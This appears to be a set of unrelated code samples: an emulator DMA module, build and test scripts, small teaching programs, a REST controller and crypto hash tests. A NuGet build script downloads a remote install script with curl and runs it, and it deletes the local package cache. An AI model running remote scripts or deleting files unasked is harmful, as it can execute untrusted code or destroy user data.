}
bool oam_dma_conflict(uint16_t address, int oam_dma_src_address, const age::gb_device& device)
{
// CGB:
// using work ram as OAM DMA source will not cause conflicts when
// accessing the external bus or the video bus:
// (gambatte) oamdma/oamdma_srcC000_busypop7FFF_dmg08_out657665AA_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_srcC000_busypop9FFF_dmg08_out65765576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_srcC000_busypopBFFF_dmg08_out65766576_cgb04c_out65765576
// (gambatte) oamdma/oamdma_srcE000_busypop7FFF_dmg08_out657665AA_cgb04c_outFFFFFFAA
// (gambatte) oamdma/oamdma_srcE000_busypop9FFF_dmg08_out65765576_cgb04c_outFFFF55FF
//
if (device.cgb_mode())
{
return is_work_ram_dma_source(oam_dma_src_address)
? (address >= 0xC000)
: (age::is_video_ram(address) == age::is_video_ram(oam_dma_src_address));
}
return age::is_video_ram(address) == age::is_video_ram(oam_dma_src_address);
}
} // namespace
age::gb_oam_dma::gb_oam_dma(const gb_device& device,
const gb_clock& clock,
gb_memory& memory,
gb_events& events,
gb_lcd& lcd)
: m_device(device),
m_clock(clock),
m_memory(memory),
m_events(events),
m_lcd(lcd),
m_oam_dma_reg(device.is_cgb_device() ? 0x00 : 0xFF)
{
}
age::int16_t age::gb_oam_dma::conflicting_read(uint16_t address)
{
AGE_ASSERT(address < 0xFE00)
if (!dma_active())
{
return -1;
}
// no OAM DMA conflict: regular read
if (!oam_dma_conflict(address, m_oam_dma_src_address, m_device))
{
return -1;
}
auto msg = log();
msg << "OAM DMA read conflict:";
auto result = m_next_oam_byte;
// CGB OAM DMA conflict:
// when work ram is not used as OAM DMA source,
// reading from CGB work ram at 0xC000 - 0xDFFF will read either always
// from 0xC000 - 0xCFFF or always from 0xD000 - 0xDFFF,
// depending on 0xFF46 & 0x10:
// (gambatte) oamdma/oamdma_src0000_busypopDFFF_dmg08_out65766576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_src0000_busypopEFFF_dmg08_out65766576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_src7F00_busypopDFFF_dmg08_out65766576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_src7F00_busypopEFFF_dmg08_out65766576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_srcBF00_busypopDFFF_dmg08_out65766576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_srcBF00_busypopEFFF_dmg08_out65766576_cgb04c_out657655AA
// (gambatte) oamdma/oamdma_srcC000_busypopDFFF_dmg08_cgb04c_out65766576
// (gambatte) oamdma/oamdma_srcC000_busypopEFFF_dmg08_cgb04c_out65766576
// (gambatte) oamdma/oamdma_srcE000_busypopDFFF_dmg08_out65766576_cgb04c_outFFFF55AA
// (gambatte) oamdma/oamdma_srcE000_busypopEFFF_dmg08_out65766576_cgb04c_outFFFF55AA
//
if (m_device.cgb_mode() && (address >= 0xC000) && !is_work_ram_dma_source(m_oam_dma_src_address))
{
int work_ram_offset = (m_oam_dma_reg & 0x10) ? 0xD000 : 0xC000;
result = m_memory.read_byte(work_ram_offset + (address & 0xFFF));
msg << "\n * CGB: rewire to work ram at " << log_hex16(work_ram_offset);
}
// CGB:
// OAM DMA VRAM conflicts will replace the next value written to
// OAM with zero:
// (gambatte) oamdma/oamdma_src8000_busypop7FFF_dmg08_out65765576_cgb04c_out65005576
// (gambatte) oamdma/oamdma_src8000_busypop9FFF_2_dmg08_out657665FF_cgb04c_out007665FF
// (gambatte) oamdma/oamdma_src8000_busypop9FFF_dmg08_out657665AA_cgb04c_out007665AA
//
if (m_device.cgb_mode() && is_video_ram(address))
{
msg << "\n * CGB: next write to OAM will be 0x00 (OAM DMA from VRAM)";
m_override_next_oam_byte = 0;
}
// log read conflict
msg << "\n * read [" << age::log_hex16(address) << "] == " << age::log_hex8(result);
return result;
}
bool age::gb_oam_dma::conflicting_write(uint16_t address, uint8_t value)
{
AGE_ASSERT(address < 0xFE00)
if (!dma_active())
{
return false;
}
// no OAM DMA conflict: regular write
if (!oam_dma_conflict(address, m_oam_dma_src_address, m_device))
{
return false;
}
auto msg = log();
msg << "OAM DMA conflict while trying to write [" << log_hex16(address) << "] = " << log_hex8(value);
// CGB OAM DMA conflict:
// when work ram is not used as OAM DMA source,
// writing to CGB work ram at 0xC000 - 0xDFFF will write either always
// to 0xC000 - 0xCFFF or always to 0xD000 - 0xDFFF,
// depending on 0xFF46 & 0x10:
// (gambatte) oamdma/oamdma_src0000_busypushC001_dmg08_out55AA1234_cgb04c_out65AA1255
// (gambatte) oamdma/oamdma_src0000_busypushE001_dmg08_out55AA1234_cgb04c_out6576AA55
// (gambatte) oamdma/oamdma_srcA000_busypushC001_dmg08_out55AA1234_cgb04c_out65AA1255
// (gambatte) oamdma/oamdma_srcA000_busypushE001_dmg08_out55AA1234_cgb04c_out6576AA55
// (gambatte) oamdma/oamdma_srcBF00_busypushC001_dmg08_out55AA1234_cgb04c_out65AA1255
// (gambatte) oamdma/oamdma_srcBF00_busypushE001_dmg08_out55AA1234_cgb04c_out6576AA55
// (gambatte) oamdma/oamdma_srcC000_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
// (gambatte) oamdma/oamdma_srcC000_busypushE001_dmg08_out45221234_cgb04c_out65761234
// (gambatte) oamdma/oamdma_srcE000_busypushC001_dmg08_out45221234_cgb04c_outFFAA1255
// (gambatte) oamdma/oamdma_srcE000_busypushE001_dmg08_out45221234_cgb04c_outFFFFAA55
//
if (m_device.cgb_mode() && (address >= 0xC000))
{
if (!is_work_ram_dma_source(m_oam_dma_src_address))
{
int work_ram_offset = (m_oam_dma_reg & 0x10) ? 0xD000 : 0xC000;
int work_ram_address = work_ram_offset + (address & 0xFFF);
m_memory.write_byte(work_ram_address, value);
msg << "\n * CGB: will write [" << log_hex16(work_ram_address) << "] = " << log_hex8(value) << " instead";
return true;
}
// When work ram is used as OAM DMA source,
// writing to work ram during DMA has no effect:
// (gambatte) oamdma/oamdma_srcC000_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
// (gambatte) oamdma/oamdma_srcC000_busypushE001_dmg08_out45221234_cgb04c_out65761234
// (gambatte) oamdma/oamdma_srcDF00_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
// (gambatte) oamdma/oamdma_srcDF00_busypushE001_dmg08_out45221234_cgb04c_out65761234
//
msg << "\n * CGB: work ram write ignored, won't affect OAM DMA from work ram";
return true;
}
m_override_next_oam_byte = value;
// CGB:
// OAM DMA VRAM conflicts will write zero to the OAM:
// (gambatte) oamdma/oamdma_src8000_busypush8001_dmg08_out55761234_cgb04c_out00761234
// (gambatte) oamdma/oamdma_src8000_busypushA001_dmg08_out65AA1255_cgb04c_out65001255
// (gambatte) oamdma/oamdma_src9F00_busypush8001_dmg08_out55761234_cgb04c_out00761234
// (gambatte) oamdma/oamdma_src9F00_busypushA001_dmg08_out65AA1255_cgb04c_out65001255
//
if (m_device.cgb_mode())
{
if (is_video_ram(address))
{
m_override_next_oam_byte = 0;
msg << "\n * CGB: replacing " << log_hex8(value)
<< " with " << log_hex8(m_override_next_oam_byte) << " (OAM DMA from VRAM)";
}
}
// DMG:
// any writes during OAM DMA transfer from work ram will mix up existing
// OAM data and the data to be written:
// (gambatte) oamdma/oamdma_srcC000_busypush0001_dmg08_out4576AA34_cgb04c_out6576AA34
// (gambatte) oamdma/oamdma_srcC000_busypush8001_dmg08_out65221255_cgb04c_out65761255
// (gambatte) oamdma/oamdma_srcC000_busypushC001_dmg08_out45221234_cgb04c_out6576AA34
// (gambatte) oamdma/oamdma_srcC000_busypushE001_dmg08_out45221234_cgb04c_out65761234
//! \todo DMG: mixing OAM data & work ram writes: we should probably examine this further
//
else
{
if ((m_oam_dma_src_address >= 0xC000) && (m_oam_dma_src_address < 0xFE00))
{
m_override_next_oam_byte = m_next_oam_byte & value;
msg << "\n * DMG: replacing " << log_hex8(value)
<< " with " << log_hex8(m_override_next_oam_byte)
<< " (mixing OAM data when writing to work ram)";
}
}
// log write conflict
msg << "\n * will write " << log_hex8(m_override_next_oam_byte) << " to OAM next"
<< "\n * will NOT write [" << log_hex16(address) << "] = " << log_hex8(value);
return true;
}
void age::gb_oam_dma::set_back_clock(int clock_cycle_offset)
{
gb_set_back_clock_cycle(m_oam_dma_last_cycle, clock_cycle_offset);
}
void age::gb_oam_dma::write_dma_reg(uint8_t value)
{
// Reading the DMA register will always return the last value
// written to it even if no OAM DMA was triggered.
//
// (mooneye-gb) acceptance/oam_dma/reg_read
//
m_oam_dma_reg = value;
// DMG: OAM DMA starts after the next M-cycle
//
// (mooneye-gb) acceptance/oam_dma_start
//
int clk_start = m_clock.get_machine_cycle_clocks() * 2;
m_events.schedule_event(gb_event::start_oam_dma, clk_start);
log() << "write DMA = " << log_hex8(value)
<< ", OAM DMA will start on clock cycle " << (m_clock.get_clock_cycle() + clk_start)
<< (m_oam_dma_active ? " and terminate the current OAM DMA" : "");
}
void age::gb_oam_dma::handle_start_dma_event()
{
m_oam_dma_last_cycle = m_clock.get_clock_cycle();
m_oam_dma_active = true;
m_oam_dma_offset = 0;
// Trying to trigger an OAM DMA transfer from a memory address
// greater than 0xDFFF will instead trigger an OAM DMA transfer
// for the corresponding 0xC000-0xDFFF memory range.
//
// (mooneye-gb) acceptance/oam_dma/sources-dmgABCmgbS
//
// CGB: triggering an OAM DMA transfer from a memory address
// greater than 0xDFFF will set OAM data to 0xFF.
//
// (gambatte) oamdma/oamdma_srcE000_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
// (gambatte) oamdma/oamdma_srcE000_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
// (gambatte) oamdma/oamdma_srcEF00_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
// (gambatte) oamdma/oamdma_srcEF00_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
// (gambatte) oamdma/oamdma_srcF000_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
// (gambatte) oamdma/oamdma_srcF000_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
// (gambatte) oamdma/oamdma_srcFE00_busypopFE9F_dmg08_out6576FFFF_cgb04c_outFFFFFFFF
// (gambatte) oamdma/oamdma_srcFE00_busypushFEA1_dmg08_out65768700_cgb04c_outFFFFFF34
//
m_oam_dma_src_address = m_device.is_cgb_device()
? m_oam_dma_reg * 0x100
: (m_oam_dma_reg * 0x100) & ((m_oam_dma_reg > 0xDF) ? 0xDF00 : 0xFF00);
log() << "starting OAM DMA, reading from " << log_hex16(m_oam_dma_src_address);
}
void age::gb_oam_dma::continue_dma()
{
if (!m_oam_dma_active)
{
return;
}
int current_clk = m_clock.get_clock_cycle();
int cycles_elapsed = current_clk - m_oam_dma_last_cycle;
cycles_elapsed &= ~(m_clock.get_machine_cycle_clocks() - 1);
m_oam_dma_last_cycle += cycles_elapsed;
cycles_elapsed <<= m_clock.is_double_speed() ? 1 : 0;
AGE_ASSERT((cycles_elapsed & 3) == 0)
int bytes = std::min(cycles_elapsed / 4, 160 - m_oam_dma_offset);
for (int i = m_oam_dma_offset, max = m_oam_dma_offset + bytes; i < max; ++i)
{
uint8_t byte = read_dma_byte(i);
//! \todo apparently oam dma is not blocked by mode 2 and 3, is there any test rom for this?
// (see e.g. Zelda on DMG: sprites bugs when blocking oam writes here)
m_lcd.write_oam_dma(i, byte);
m_override_next_oam_byte = -1;
auto msg = log();
msg << "write OAM [" << log_hex16(0xFE00 + i) << "] = " << log_hex8(byte);
if (m_oam_dma_src_address >= 0xE000)
{
msg << " (CGB: OAM DMA source >= 0xE000 invalid)";
}
else
{
uint16_t address = m_oam_dma_src_address + i;
msg << " == [" << log_hex16(address) << "]";
}
}
m_oam_dma_offset += bytes;
AGE_ASSERT(m_oam_dma_offset <= 160)
if (m_oam_dma_offset >= 160)
{
m_oam_dma_active = false;
m_oam_dma_last_cycle = gb_no_clock_cycle;
log() << "OAM DMA finished";
}
else
{
m_next_oam_byte = read_dma_byte(m_oam_dma_offset);
}
}
age::uint8_t age::gb_oam_dma::read_dma_byte(int offset) const
{
if (m_override_next_oam_byte >= 0)
{
return m_override_next_oam_byte;
}
if (m_oam_dma_src_address >= 0xE000)
{
AGE_ASSERT(m_device.is_cgb_device())
return 0xFF;
}
return m_memory.read_byte(m_oam_dma_src_address + offset);
}
|
#!/usr/bin/env bash
while true ; do
case "$1" in
-c|--clear-cache) CLEAR_CACHE=1 ; shift ;;
--) shift ; break ;;
*) shift ; break ;;
esac
done
RESULTCODE=0
# Download the CLI install script to cli
echo "Installing dotnet CLI"
mkdir -p cli
curl -o cli/dotnet-install.sh https://raw.githubusercontent.com/dotnet/cli/master/scripts/obtain/dotnet-install.sh
# Run install.sh for cli
chmod +x cli/dotnet-install.sh
# v1 needed for some test
cli/dotnet-install.sh -i cli -c 1.0
# todo: update to read version from build.props https://github.com/NuGet/Home/issues/7485
cli/dotnet-install.sh -i cli -c release/2.2.1xx
# Display current version
DOTNET_TEST="$(pwd)/cli_test/dotnet"
DOTNET="$(pwd)/cli/dotnet"
$DOTNET --version
echo "================="
# init the repo
git submodule init
git submodule update
# clear caches
if [ "$CLEAR_CACHE" == "1" ]
then
# echo "Clearing the nuget web cache folder"
# rm -r -f ~/.local/share/NuGet/*
echo "Clearing the nuget packages folder"
rm -r -f ~/.nuget/packages/*
fi
# restore packages
echo "$DOTNET msbuild build/build.proj /t:RestoreTests /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta"
$DOTNET msbuild build/build.proj /t:Restore /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta
if [ $? -ne 0 ]; then
echo "Restore failed!!"
exit 1
fi
# run tests
echo "$DOTNET msbuild build/build.proj /t:CoreUnitTests /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta"
$DOTNET msbuild build/build.proj /t:CoreUnitTests /p:VisualStudioVersion=15.0 /p:Configuration=Release /p:BuildNumber=1 /p:ReleaseLabel=beta
if [ $? -ne 0 ]; then
echo "Tests failed!!"
exit 1
fi
exit $RESULTCODE
|
# import libraries
library(tidyverse)
library(caret)
# load the dataset
df <- read.csv('mall_visitors.csv')
# create the model matrix
model_matrix <- model.matrix(~., data = df)
# set the train and test sets
set.seed(123)
train_index = createDataPartition(df$visitors_sunday, p = 0.75, list = FALSE)
train_set <- df[train_index, ]
test_set <- df[-train_index, ]
# fit the model
set.seed(123)
model_fit <- train(visitors_sunday ~., data = train_set, method = 'lm')
# make predictions
test_pred <- predict(model_fit, newdata = test_set)
# get performance metrics
confusionMatrix(test_set$visitors_sunday, test_pred) |
package uk.gov.companieshouse.ocrapiconsumer.request;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.is;
import static org.mockito.Mockito.when;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.junit.jupiter.MockitoExtension;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.client.RestTemplate;
import uk.gov.companieshouse.ocrapiconsumer.groups.Unit;
@Unit
@ExtendWith(MockitoExtension.class)
class ImageRestClientTest extends TestParent {
@Mock
private RestTemplate restTemplate;
@InjectMocks
private ImageRestClient imageRestClient;
@Test
void testGetTiffImageSuccessfully() {
// given
byte[] expected = MOCK_TIFF_CONTENT;
when(restTemplate.getForEntity(IMAGE_ENDPOINT, byte[].class))
.thenReturn(new ResponseEntity<>(MOCK_TIFF_CONTENT, HttpStatus.OK));
// when
byte[] actual = imageRestClient.getImageContentsFromEndpoint(CONTEXT_ID, IMAGE_ENDPOINT);
// then
assertThat(actual, is(expected));
}
}
|
<filename>src/com/ibm/nmon/gui/table/IntegerCellRenderer.java
package com.ibm.nmon.gui.table;
import javax.swing.table.DefaultTableCellRenderer;
import java.awt.Component;
import java.text.DecimalFormat;
import javax.swing.JTable;
/**
* Renders integer data with thousands separator.
*/
public final class IntegerCellRenderer extends DefaultTableCellRenderer {
private static final long serialVersionUID = 1867029028990000830L;
private static final DecimalFormat FORMAT = new DecimalFormat("#,##0");
public IntegerCellRenderer() {
super();
}
@Override
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus,
int row, int column) {
super.getTableCellRendererComponent(table, null, isSelected, hasFocus, row, column);
setHorizontalAlignment(TRAILING);
setValue(FORMAT.format(value));
return this;
}
}
|
const { flatten } = require("mongo-dot-notation");
const Card = require("../db/models/Card");
const { checkRequestData } = require("../helpers/functions/Express");
const { sendError, generateError } = require("../helpers/functions/Error");
exports.find = (search, projection, options = {}) => Card.find(search, projection, options);
exports.aggregate = aggregation => Card.aggregate(aggregation);
exports.findOne = (search, projection, options = {}) => Card.findOne(search, projection, options);
exports.fillCategories = data => {
const subCategoriesMetadata = {
"technology": { mainCategory: "object" },
"clothes": { mainCategory: "object" },
"movie": { mainCategory: "art" },
"tv-series": { mainCategory: "art" },
"video-game": { mainCategory: "art" },
"painting": { mainCategory: "art" },
"theatre-play": { mainCategory: "art" },
"sculpture": { mainCategory: "art" },
"architecture": { mainCategory: "art" },
"music": { mainCategory: "art" },
"animal": { mainCategory: "nature" },
"sport": { mainCategory: "activity" },
"job": { mainCategory: "activity" },
};
data.categories = data.categories.reduce((acc, category) => {
const subCategoryMetadata = subCategoriesMetadata[category];
if (subCategoryMetadata && !acc.includes(subCategoryMetadata.mainCategory)) {
acc.push(subCategoryMetadata.mainCategory);
}
return acc;
}, data.categories);
};
exports.checkAndFillDataBeforeCreate = data => this.fillCategories(data);
exports.create = async(data, options = {}) => {
await this.checkAndFillDataBeforeCreate(data);
const { toJSON } = options;
delete options.toJSON;
if (!Array.isArray(data)) {
options = null;
}
const card = await Card.create(data, options);
return toJSON ? card.toJSON() : card;
};
exports.checkAndFillDataBeforeUpdate = (data, existingCard) => {
if (!existingCard) {
throw generateError("CARD_NOT_FOUND", `Card not found.`);
}
if (data.categories) {
this.fillCategories(data);
}
};
exports.findOneAndUpdate = async(search, data, options = {}) => {
const { toJSON } = options;
delete options.toJSON;
options.new = options.new === undefined ? true : options.new;
const existingCard = await this.findOne(search);
await this.checkAndFillDataBeforeUpdate(data, existingCard);
const updatedCard = await Card.findOneAndUpdate(search, flatten(data), options);
return toJSON ? updatedCard.toJSON() : updatedCard;
};
exports.findOneAndDelete = async search => {
const card = await this.findOne(search);
if (!card) {
throw generateError("CARD_NOT_FOUND", `Card not found.`);
}
await Card.deleteOne(search);
return card;
};
exports.getFindSearch = query => {
const searchFieldsFromQuery = ["label", "categories", "difficulty"];
const search = {};
for (const field in query) {
if (searchFieldsFromQuery.includes(field)) {
search[field] = query[field];
}
}
return search;
};
exports.getFindProjection = query => query.fields ? query.fields.split(",") : null;
exports.getFindOptions = options => ({
limit: options.limit,
sort: { [options["sort-by"]]: options.order },
});
exports.getCards = async(req, res) => {
try {
const { query } = checkRequestData(req);
const findSearch = this.getFindSearch(query);
const findProjection = this.getFindProjection(query);
const findOptions = this.getFindOptions(query);
const cards = await this.find(findSearch, findProjection, findOptions);
return res.status(200).json(cards);
} catch (e) {
sendError(res, e);
}
};
exports.getCard = async(req, res) => {
try {
const { params } = checkRequestData(req);
const card = await this.findOne({ _id: params.id });
if (!card) {
throw generateError("CARD_NOT_FOUND", `Card not found with ID "${params.id}".`);
}
return res.status(200).json(card);
} catch (e) {
sendError(res, e);
}
};
exports.postCard = async(req, res) => {
try {
const { body } = checkRequestData(req);
const card = await this.create(body);
return res.status(200).json(card);
} catch (e) {
sendError(res, e);
}
};
exports.patchCard = async(req, res) => {
try {
const { body, params } = checkRequestData(req);
const card = await this.findOneAndUpdate({ _id: params.id }, body);
return res.status(200).json(card);
} catch (e) {
sendError(res, e);
}
};
exports.deleteCard = async(req, res) => {
try {
const { params } = checkRequestData(req);
const card = await this.findOneAndDelete({ _id: params.id });
return res.status(200).json(card);
} catch (e) {
sendError(res, e);
}
}; |
<reponame>LaudateCorpus1/swinch<gh_stars>10-100
/*
Copyright 2021 Adobe. All rights reserved.
This file is licensed to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License. You may obtain a copy
of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
OF ANY KIND, either express or implied. See the License for the specific language
governing permissions and limitations under the License.
*/
package spincli
import (
"fmt"
log "github.com/sirupsen/logrus"
"swinch/cmd/config"
)
type ApplicationAPI struct {
appName string
SpinCLI
}
var baseArgs = []string{
"--no-color=false",
"--config", config.HomeFolder()+config.CfgFolderName+config.CfgSpinFileName,
}
func (a *ApplicationAPI) NotFound() error {
return fmt.Errorf("Application '%v' not found\n", a.appName)
}
func (a *ApplicationAPI) deleteNotFound() error {
return fmt.Errorf("attempting to delete application '%v' which does not exist, exiting", a.appName)
}
func (a *ApplicationAPI) Get(appName string) []byte {
a.appName = appName
args := []string{"application", "get", a.appName}
buffer, err := a.executeAppCmd(append(baseArgs, args...))
a.status(err)
return buffer.Bytes()
}
func (a ApplicationAPI) Save(appName, filePath string) {
a.appName = appName
args := []string{"application", "save", "--file", filePath}
_, err := a.executeAppCmd(append(baseArgs, args...))
a.status(err)
if err == nil {
log.Infof("Application '%v' updated successfuly", a.appName)
}
defer a.rmTmp(filePath)
}
func (a ApplicationAPI) Delete(appName string) {
a.appName = appName
args := []string{"application", "delete", a.appName}
_, err := a.executeAppCmd(append(baseArgs, args...))
if err != nil {
a.status(err)
} else {
log.Infof("Delete application '%v' success", a.appName)
}
}
func (a *ApplicationAPI) status(err error) {
if err != nil {
switch err.Error() {
case a.NotFound().Error():
log.Info(a.NotFound())
case a.deleteNotFound().Error():
log.Info(a.deleteNotFound())
default:
log.Fatalf("Failed to check application status: %v", err)
}
}
}
|
<filename>Aulas/Aula 31/MeuPrimeiroProgama.java
package co.joaoemanuel;
import java.lang.reflect.Array;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
public class MeuPrimeiroProgama {
public static void main(String[] args) {
List<String> names = new ArrayList<>();
// Como adicionar elementos no array?
names.add("Nome 1");
names.add("Nome 2");
names.add("Nome 3");
names.add("Nome 4");
// Como buscar um elemento especifico pelo indice get()
for (byte i = 0; i < names.size(); i++){
System.out.println(names.get(i));
}
// Como buscar o indice a partir de um elemento
System.out.println(names.indexOf("Nome 2"));
// Verifica se a lista está vazia ou não
System.out.println(names.isEmpty());
// Verifica se a lista contém algum elemento
System.out.println(names.contains("Nome 4"));
// Retorna o tamanho da lista
System.out.println(names.size());
// Limpar de vez a lista (remover todos os elementos), names.clear não possui retorno pois é um void
names.clear();
}
public static void print(String text) {
System.out.println(text);
}
public static void printi(int[] num) {
System.out.println(num);
}
} |
#!/usr/bin/python3
'''
o assert serve para validar se o retorno é verdadeiro
caso contrário gerará uma execao
classe='success' = é um parametro opcional
Se nao for passado o valor padrao sera sucesso
'''
def tag_bloco(texto, classe='success'):
return f'<div class="{classe}">{texto}</div>'
if __name__ == '__main__':
# Testes (assertions)
assert tag_bloco('Incluído com sucesso!') == \
'<div class="success">Incluído com sucesso!</div>'
assert tag_bloco('Impossível excluir!', 'error') == \
'<div class="error">Impossível excluir!</div>'
print(tag_bloco('bloco')) # Chamando a funcao
# Fontes:
# Curso Python 3 - Curso Completo do Básico ao Avançado Udemy Aula 115
# https://github.com/cod3rcursos/curso-python/tree/master/funcoes
|
"""
Classify reviews of a product as either positive or negative using a supervised machine learning model
"""
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import train_test_split
# Read the dataset
df = pd.read_csv('data/reviews.csv')
# Extract the features and target
X = df['text']
y = df['label']
# Vectorize the features
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(X)
# Split data into train and test
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
# Train the model
clf = MultinomialNB()
clf.fit(X_train, y_train)
# Evaluate the model
accuracy = clf.score(X_test, y_test)
# Print the accuracy
print("Accuracy: {}".format(accuracy)) |
pip install cupy pynvrtc git+https://github.com/salesforce/pytorch-qrnn
|
public class Fibonacci
{
public static void Main(string[] args)
{
int n = 10;
Console.WriteLine("Fibonacci Numbers up to {0} are : ", n);
int a = 0, b = 1, c = 0;
Console.Write("{0} {1}", a, b);//printing 0 and 1
for (int i = 2; i < n; ++i)//loop starts from 2 because 0 and 1 are already printed
{
c = a + b;
Console.Write(" {0}", c);
a = b;
b = c;
}
}
} |
#include <boost/test/unit_test.hpp>
#include <algorithm>
#include <deque>
#include <iostream>
#include <iterator>
#include <list>
#include <sstream>
#include <vector>
#include <koinos/bigint.hpp>
#include <koinos/util/conversion.hpp>
#include <koinos/crypto/elliptic.hpp>
#include <koinos/crypto/multihash.hpp>
#include <koinos/crypto/merkle_tree.hpp>
#include <koinos/common.pb.h>
#include <koinos/tests/crypto_fixture.hpp>
using namespace koinos::crypto;
BOOST_FIXTURE_TEST_SUITE( crypto_tests, crypto_fixture )
BOOST_AUTO_TEST_CASE( ripemd160_test )
{
test( multicodec::ripemd_160, TEST1, "8eb208f7e05d987a9b044a8e98c6b087f15a0bfc" );
test( multicodec::ripemd_160, TEST2, "9c1185a5c5e9fc54612808977ee8f548b2258d31" );
test( multicodec::ripemd_160, TEST3, "12a053384a9c0c88e405a06c27dcf49ada62eb2b" );
test( multicodec::ripemd_160, TEST4, "6f3fa39b6b503c384f919a49a7aa5c2c08bdfb45" );
test( multicodec::ripemd_160, TEST5, "52783243c1697bdbe16d37f97f68f08325dc1528" );
test_big( multicodec::ripemd_160, "29b6df855772aa9a95442bf83b282b495f9f6541" );
}
BOOST_AUTO_TEST_CASE( sha1_test )
{
test( multicodec::sha1, TEST1, "a9993e364706816aba3e25717850c26c9cd0d89d" );
test( multicodec::sha1, TEST2, "da39a3ee5e6b4b0d3255bfef95601890afd80709" );
test( multicodec::sha1, TEST3, "84983e441c3bd26ebaae4aa1f95129e5e54670f1" );
test( multicodec::sha1, TEST4, "a49b2446a02c645bf419f995b67091253a04a259" );
test( multicodec::sha1, TEST5, "34aa973cd4c4daa4f61eeb2bdbad27316534016f" );
test_big( multicodec::sha1, "7789f0c9ef7bfc40d93311143dfbe69e2017f592" );
}
BOOST_AUTO_TEST_CASE( sha256_test )
{
test( multicodec::sha2_256, TEST1, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" );
test( multicodec::sha2_256, TEST2, "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" );
test( multicodec::sha2_256, TEST3, "248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1" );
test( multicodec::sha2_256, TEST4, "cf5b16a778af8380036ce59e7b0492370b249b11e8f07a51afac45037afee9d1" );
test( multicodec::sha2_256, TEST5, "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0" );
test_big( multicodec::sha2_256, "50e72a0e26442fe2552dc3938ac58658228c0cbfb1d2ca872ae435266fcd055e" );
}
BOOST_AUTO_TEST_CASE( sha512_test )
{
test( multicodec::sha2_512, TEST1, "ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a"
"2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f" );
test( multicodec::sha2_512, TEST2, "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
"47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" );
test( multicodec::sha2_512, TEST3, "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c335"
"96fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" );
test( multicodec::sha2_512, TEST4, "8e959b75dae313da8cf4f72814fc143f8f7779c6eb9f7fa17299aeadb6889018"
"501d289e4900f7e4331b99dec4b5433ac7d329eeb6dd26545e96e55b874be909" );
test( multicodec::sha2_512, TEST5, "e718483d0ce769644e2e42c7bc15b4638e1f98b13b2044285632a803afa973eb"
"de0ff244877ea60a4cb0432ce577c31beb009c5c2c49aa2e4eadb217ad8cc09b" );
test_big( multicodec::sha2_512, "b47c933421ea2db149ad6e10fce6c7f93d0752380180ffd7f4629a712134831d"
"77be6091b819ed352c2967a2e2d4fa5050723c9630691f1a05a7281dbe6c1086" );
}
BOOST_AUTO_TEST_CASE( ecc )
{
private_key nullkey;
std::string pass = "<PASSWORD>";
for( uint32_t i = 0; i < 100; ++ i )
{
multihash h = hash( multicodec::sha2_256, pass.c_str(), pass.size() );
private_key priv = private_key::regenerate( h );
BOOST_CHECK( nullkey != priv );
public_key pub = priv.get_public_key();
pass += "1";
multihash h2 = hash( multicodec::sha2_256, pass.c_str(), pass.size() );
public_key pub1 = pub.add( h2 );
private_key priv1 = private_key::generate_from_seed(h, h2);
auto sig = priv.sign_compact( h );
auto recover = public_key::recover( sig, h );
BOOST_CHECK( recover == pub );
}
}
BOOST_AUTO_TEST_CASE( private_wif )
{
std::string secret = "foobar";
std::string wif = "<KEY>";
private_key key1 = private_key::regenerate( hash( multicodec::sha2_256, secret.c_str(), secret.size() ) );
BOOST_CHECK_EQUAL( key1.to_wif(), wif );
private_key key2 = private_key::from_wif( wif );
BOOST_CHECK( key1 == key2 );
// Encoding:
// Prefix Secret Checksum
// 80 C3AB8FF13720E8AD9047DD39466B3C8974E592C2FA383D4A3960714CAEF0C4F2 C957BEB4
// Wrong checksum, change last octal (4->3)
